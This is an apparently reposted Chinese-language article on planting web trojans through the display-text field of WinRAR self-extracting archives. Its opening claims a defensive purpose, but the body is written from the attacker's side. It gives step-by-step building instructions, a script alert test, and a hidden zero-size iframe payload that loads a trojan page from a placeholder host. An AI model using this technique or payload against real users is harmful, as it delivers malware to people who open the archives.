WinRAR与木马结合的挂马安全隐患(图)

    以下是一篇关于WinRAR与木马结合的分析文章，我们可以从病毒制作者的角度看到其实施挂马的原理，所谓知己知彼，百战不迨，了解了Winrar挂马的原理，就便于我们采取防范措施，达到清除病毒，保护系统安全的目的：

    压缩文件是最见的文件类型之一，无论是正常的软件程序，或者是“精心”制作的压缩包木马，都随处可见。对于这类最常见的文件，我们当然会想方设法，让它为我们传播木马服务。不过，普通的压缩包中夹带木马的方法已经有些落伍了，今天我们将重点分析一种WinRAR压缩包传播木马的新思路！

    一、WinRAR与木马结合挂马的优点

    大家都知道WinRAR软件可以制作EXE自解压文件，以方便没有安装WinRAR软件的用户。WinRAR制作的自解压文件非常常见，而且不少软件也开始采用它来制作安装程序。用WinRAR制作自解压文件时，还可以对自解压界面进行自定义美化，在自解压时显示任意的文件或图片。我们可以通过对WinRAR自解压文件界面的再定义，从而欺骗对方在解压前执行网页木马。

    二、简单测试

    首先，我们需要制作一个WinRAR自解压文件。可以将任意资源，比如几张图片或音乐之类的打包压缩成RAR格式。然后用WinRAR打开压缩包，点击WinRAR工具栏上的“自解压”按钮，打开自解压文件制作对话框。在“自解压模块”中选择“Deault.sfx”模块，点击“高级自解压选项”按钮，打开高级自解压选项设置对话框。选择“文本和图标”选项卡，在下面的“自解压文件窗口中显示的文本”区里，可以输人任意文字，都将显示在自解压界面中。如果我们输入网页代码，是否会执行呢？

    这里我们先来测试一下，在文本输入区中，输入如下代码：

    <s cript>alert('nethack')</s cript>

    这段代码常常被用来检测跨站漏洞，如果存在漏洞的话，那么在网页中会弹出一个文字提示对话框。点击“确定”按钮，返回自解压对话框，再点击“确定”按钮，即可在压缩包文件路径下，生成一个同名的后缀为.exe的自解压文件。现在，我们来双击这个自解压文件，看看前面的跨站检测代码是否执行？自解压文件打开后，同时弹出了刚才设置的文字提示对话框，说明网页代码执行了。

    由此可见，WinRAR的自解压文件界面存在着跨站挂马的漏洞，我们完全可以修改刚才的测试代码，让自解压文件在打开时显示任意的网页，当然也可以显示木马网页，从而实现利用WinRAR自解压文件挂网页木马的攻击目的！

　  三、自解压挂网页木马

    现在，我们来制作一个具有挂马攻击性的WinRAR自解压文件。首先，准备一个网页木马，并将其上传到某个网站空间中去。这里假设网页木马链接地址为“http://www.XXX.com/01.htm”。然后制作一个自解压文件，方法与前面相同，但是在写入文本框中，我们需要输入如下代码：

    <iframe width=0 height=0 src="http://www.XXX.com/01.htm"></iframe>

    这段代码表示显示一个长宽都为0网页象素，也就是不可见的页面框架，显示的网页内容为指定的木马网页。

转截请注明:文章来自 pc捍卫者 http://www.pchwz.com 本站发布此文为传递更多信息之目的,不表明pc捍卫者赞同其观点